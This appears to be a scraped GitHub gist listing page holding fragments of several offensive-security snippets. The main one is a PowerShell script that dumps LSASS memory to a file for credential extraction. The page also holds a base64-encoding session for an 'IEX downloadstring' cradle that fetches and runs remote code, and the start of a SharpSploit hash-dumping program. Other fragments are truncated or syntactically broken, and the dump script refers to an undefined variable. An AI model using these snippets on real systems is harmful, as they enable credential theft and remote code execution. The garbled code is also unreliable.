T0w3ntum / Dump-LSASS.ps1
Created March 20, 2017 00:34 — forked from natesubra/Dump-LSASS.ps1
LSASS minidump
$LSASSProc = Get-Process lsass
$FileStream = New-Object IO.FileStream('c:\lsass.dmp', [IO.FileMode]::Create)
$Result = ((([PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')).GetNestedType('NativeMethods', 'NonPublic')).GetMethod('MiniDumpWriteDump', ([Reflection.BindingFlags] 'NonPublic, Static'))).Invoke($null,@($proc.Handle,$proc.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))

import hashlib
import hmac
import sys
secret = sys.argv[2]
message = bytes(sys.argv[1]).encode('utf-8')
secret = bytes(secret).encode('utf-8')
hash =, message, hashlib.sha256)
T0w3ntum / Framebuffer to PNG
Created February 20, 2018 20:11 — forked from JakubVanek/ Framebuffer to PNG
Convert raw BGRA framebuffer to RGB png file
This program can be used to convert raw BGRA 8888 framebuffer to standard PNG file.
T0w3ntum /
Created March 7, 2018 12:55
Wrapper to call Frida scripts
import frida
import sys
scriptname = sys.argv[1]
procname = sys.argv[2]
fd = open(scriptname, "r")
def on_message(message, data):
PS C:\Users\User> $Text = "IEX ((new-object net.webclient).downloadstring(''))"
PS C:\Users\User> $Bytes = [System.Text.Encoding]::Unicode.getBytes($Text)
PS C:\Users\User> $EncodedText = [Convert]::ToBase64String($Bytes)
PS C:\Users\User> $EncodedText
using System;
using SharpSploit.Credentials;
using System.Management;
using System.IO;
class SMBDumpHash
static void Main(string[] args)
if (args.Length == 0)